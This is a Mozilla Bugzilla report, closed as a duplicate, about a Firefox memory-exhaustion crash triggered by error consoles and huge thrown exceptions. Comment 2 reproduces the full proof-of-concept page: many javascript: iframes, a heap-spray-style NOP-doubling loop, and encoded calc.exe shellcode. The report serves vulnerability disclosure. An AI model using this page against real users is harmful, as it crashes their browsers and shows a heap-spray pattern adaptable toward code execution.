Firefox Memory Exhaustion DoS with multiple Error Consoles

RESOLVED DUPLICATE of bug 243170

Status

Toolkit Graveyard
Error Console
--
critical
RESOLVED DUPLICATE of bug 243170
10 years ago
11 months ago

People

(Reporter: Eduardo Vela N, Unassigned)

Tracking

({crash})

Details

(URL)

(Reporter)

Description

10 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5

While popping a lot of Error Consoles, when throwing very large exceptions through "throw 'string'", Firefox crashes.

Reproducible: Always

Steps to Reproduce:
1. Enter to the PoC website, be aware, the PoC may crash your browser.
Actual Results:  
After 2 minutes, "Memory Limit Reached" Error, and NULL Pointer Exception some seconds after that.

Expected Results:  
"out of memory" exception at the console.

After 2 minutes, "Memory Limit Reached" Error, and a NULL Pointer Exception some seconds after that.

I thought in addressing this bug as critical, because "the software crashes and/or hangs", but I don't think it's really "critical", so I left it as Major bug..

Comment 1

10 years ago
confirmed in 
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a7pre) Gecko/2007072905 Minefield/3.0a7pre
Status: UNCONFIRMED → NEW
Ever confirmed: true

Comment 2

10 years ago
And it crashes Internet Explorer too :-)

The content of that page is :

<html>
<head>
<title>Firefox [Error Console+Throw] Denial of Service (by sirdarckcat)</title>
<style>
iframe{height: 1px; width: 1px; border: 0px;}
</style>
</head>
<body>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<script language="JavaScript">
	var m=/*nop + nop*/unescape("%u9090");
	//shellcode never get's executed.. this was just for testing.., the code of the shellcode is a simple >> calc.exe << PoC
	var s=/*shellcode*/unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065");
	for(var i=0;i<64;i++){
		m=m+m;
		document.write('<script>throw m+s;</scr'+'ipt>');
	}
</script>
</body>
</html>

Comment 3

10 years ago
We removed the ability for web sites to open the error console in bug 243170 on trunk only (for Firefox 3).

You're clearly hitting some kind of out-of-memory crash bug, but we have plenty of OOM crash bug reports, and this one is hard to reproduce even on branch, so I don't think it warrants special investigation.  If you can figure out what the OOM crash bug is by looking at a stack trace for the crash, please file another bug report (preferably with a patch).
Severity: major → critical
Status: NEW → RESOLVED
Last Resolved: 10 years ago
Keywords: crash
Resolution: --- → DUPLICATE
Duplicate of bug: 243170
Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9a7pre) Gecko/2007072905 Minefield/3.0a7pre ID:2007072905

The URL makes my firefox take a silly ammount of memory and effectively hang too.

Comment 5

10 years ago
The script at the bottom looks like it's trying to fill up memory, so that's not too surprising.
(Assignee)

Updated

9 years ago
Product: Firefox → Toolkit
(Assignee)

Updated

11 months ago
Product: Toolkit → Toolkit Graveyard
You need to log in before you can comment on or make changes to this bug.